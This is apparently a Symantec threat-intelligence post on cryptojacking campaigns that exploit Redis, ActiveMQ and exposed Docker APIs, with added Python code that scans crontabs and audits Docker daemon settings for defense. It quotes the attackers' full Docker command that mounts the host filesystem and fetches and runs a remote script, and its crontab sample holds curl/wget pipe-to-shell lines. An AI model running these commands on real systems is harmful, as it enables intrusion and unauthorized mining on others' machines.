Cryptojacking Criminals Are Using Multiple Techniques to Install Coinminers
Symantec has been tracking several cryptojacking campaigns that use bugs and exposed API ports to compromise computers.
Symantec has blocked more than 309 million cryptojacking attempts in the last quarter and this number is likely to increase further as cyber criminals use every possible way to get their coinminers onto users’ computers. In our work to protect customers from cryptojacking, we have been tracking multiple campaigns taking advantage of various software vulnerabilities, as well as exposed APIs, to install miners on computers. We’ll take a closer look at a couple of these campaigns in this blog.
Campaign 1: Targeting vulnerabilities
Initial alert
From various sensors that Symantec has deployed around the world we noticed an attack on port 6379 exploiting an arbitrary file upload vulnerability in the open-source in-memory data structure store Redis.
The Redis vulnerability can be exploited by attackers to upload arbitrary files, which allows them to create entries in the crontab file. This allows the attackers to schedule cron jobs that download and execute a Bash script file hosted on Pastebin every minute. The Bash script downloads Base64-encoded data, also hosted on Pastebin. The decoded data is actually another Bash script that performs several actions including, but not limited to:
1. Ending other coin-mining processes running on the system
2. Downloading and running its own coin-mining programs
3. Setting up cron jobs, similar to the one shown in Figure 1
4. Adding an iptables rule to restrict access to port 6379 from the internet
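The persistence described above (an every-minute cron job that fetches a Bash script from Pastebin and runs it) is something a defender can look for on a suspected host. The following is an added example, not code from the Symantec post: it parses crontab text and flags entries that match that download-and-execute pattern. The crontab lines, the paste-site hostname and the IP address are constructed for illustration.

```python
import re

# Constructed sample crontab lines (not taken from the campaign).
# 198.51.100.7 is a documentation address; pastebin.example is a placeholder.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/15 * * * * /opt/backup/run.sh
* * * * * curl -fsSL https://pastebin.example/raw/REDACTED | sh
* * * * * wget -q -O- http://198.51.100.7/auto.sh | bash
"""

PASTE_HOSTS = ("pastebin",)
FETCHERS = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(ba)?sh\b")

def parse_crontab(text):
    """Yield (schedule, command) tuples, skipping comments and blank lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)  # five schedule fields, then the command
        if len(fields) < 6:
            continue
        yield " ".join(fields[:5]), fields[5]

def suspicious_entries(text):
    """Return cron entries that look like the campaign's persistence:
    a remote download (curl/wget) combined with at least one more
    indicator (every-minute schedule, pipe into a shell, paste site)."""
    findings = []
    for schedule, command in parse_crontab(text):
        reasons = []
        if schedule == "* * * * *":
            reasons.append("runs every minute")
        if FETCHERS.search(command):
            reasons.append("downloads remote content")
        if PIPE_TO_SHELL.search(command):
            reasons.append("pipes download into a shell")
        if any(h in command.lower() for h in PASTE_HOSTS):
            reasons.append("references a paste site")
        # A download alone could be a legitimate job; require a second indicator.
        if "downloads remote content" in reasons and len(reasons) >= 2:
            findings.append((schedule, command, reasons))
    return findings
```

Run it over the output of `crontab -l` for each user and the files under /etc/cron.d to cover both user and system crontabs.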
Infection module
One of the functions found in the decoded Bash script is a single line of Python code that downloads another Base64-encoded Python script from Pastebin.
The downloaded script, when decoded, reveals the campaign’s spreading mechanism, which makes use of a couple of vulnerabilities to spread further. The first vulnerability is an arbitrary file upload vulnerability (CVE-2016-3088) in the Fileserver web application in the open-source message broker ActiveMQ.
The second vulnerability is the arbitrary file upload vulnerability in Redis, which was the initial source for tracking down this campaign.
Also included in the Python script was a URL used to retrieve a list of target IP addresses. The IP addresses were downloaded from an image hosting site (thyrsi[dot]com).
The wallet address used in this campaign has a couple of worker IDs: one for the XMR-Stak coinminer (sixx) and another for the XMRig coinminer (sixy). Querying the wallet address online, however, returns a few more workers.
Campaign 2: A different tactic via Docker
We also found a similar campaign where attackers are targeting open Docker API ports to download and execute coinminers. They start by scanning the internet for open ports 2375 (the Docker REST API HTTP port) and 2376 (the Docker REST API HTTPS port) using the Masscan tool. When an open instance is found, the attackers send a request to create a container with the following command:
docker -H tcp://$HOSTLINE run --rm -v /:/mnt alpine chroot /mnt /bin/sh -c "wget http://IP/auto.sh -O /auto.sh;chmod 777 /auto.sh;sh /auto.sh;"
The “auto.sh” file performs several actions including, but not limited to:
1. Install packages like systemd, cURL, Masscan, iproute2, OpenSSH
2. Add the users “richard” and “frank” to the system
3. Establish backdoor access to the machine by modifying the SSH config file to listen on port 22 as well as 7878, enabling password authentication, and adding public keys to the SSH authorized_keys file
4. Use Masscan to scan the subnet (gathered from the infected machine) for other open 2375 and 2376 ports and use this information to spread using open Docker API ports
Finally, it downloads a script from Pastebin that ends other mining-related processes on the system and runs its own binaries for mining the Monero cryptocurrency.
Protection
The following Symantec Intrusion Prevention System (IPS) detections protect customers from these attacks:
Attack: Redis UnAuthorized File Upload
Web Attack: Apache ActiveMQ CVE-2016-3088
Web Attack: Malicious Payload Upload 6
System Infected: Miner.Bitcoinminer Activity 7
Figure 7 shows Symantec IPS detections protecting users from these coin-mining attacks.
Mitigation
Vendors have since published updates to address the vulnerabilities discussed in this blog. Symantec advises users to ensure their computers and software are fully patched. Docker users should avoid exposing Docker REST API ports on the internet and configure Docker to use TLS authentication to avoid attackers misusing it.
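The Docker advice above (do not expose the REST API port, and require TLS) can be checked mechanically against the daemon configuration. The following is an added example, not code from the Symantec post: it audits a Docker daemon.json and reports a TCP listener that is reachable without mutual TLS, bound to all interfaces, or using the plaintext port 2375. The two configurations and the certificate paths are constructed for illustration.

```python
import json

# Constructed daemon.json examples (not from the campaign analysis).
# Weak: the API listens on every interface on the plaintext port with no TLS.
WEAK_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]
})

# Hardened: bound to a management address, HTTPS port, client certs required.
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})

TLS_KEYS = ("tlscacert", "tlscert", "tlskey")

def audit_docker_daemon(config_text):
    """Return a list of findings for a daemon.json. An empty list means
    there is no TCP listener, or every TCP listener requires mutual TLS
    and is bound to a specific address on the HTTPS port."""
    cfg = json.loads(config_text)
    findings = []
    tcp_hosts = [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]
    if not tcp_hosts:
        return findings  # only the local unix socket: nothing exposed
    if not cfg.get("tlsverify"):
        findings.append("TCP listener without tlsverify: any client can start containers")
    missing = [k for k in TLS_KEYS if k not in cfg]
    if cfg.get("tlsverify") and missing:
        findings.append("tlsverify set but missing: " + ", ".join(missing))
    for h in tcp_hosts:
        host, _, port = h[len("tcp://"):].rpartition(":")
        if host in ("", "0.0.0.0", "[::]"):
            findings.append(f"{h} binds all interfaces; restrict to a management address")
        if port == "2375":
            findings.append(f"{h} uses the plaintext port 2375")
    return findings
```

On distributions whose systemd unit already starts dockerd with `-H fd://`, a `hosts` key in daemon.json conflicts with that flag, so check the unit file as well as daemon.json.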
Further reading
For more information on cryptojacking, read the following:
Cryptojacking: A Modern Cash Cow
Check out the Security Response blog and follow Threat Intel on Twitter to keep up-to-date with the latest happenings in the world of threat intelligence and cyber security.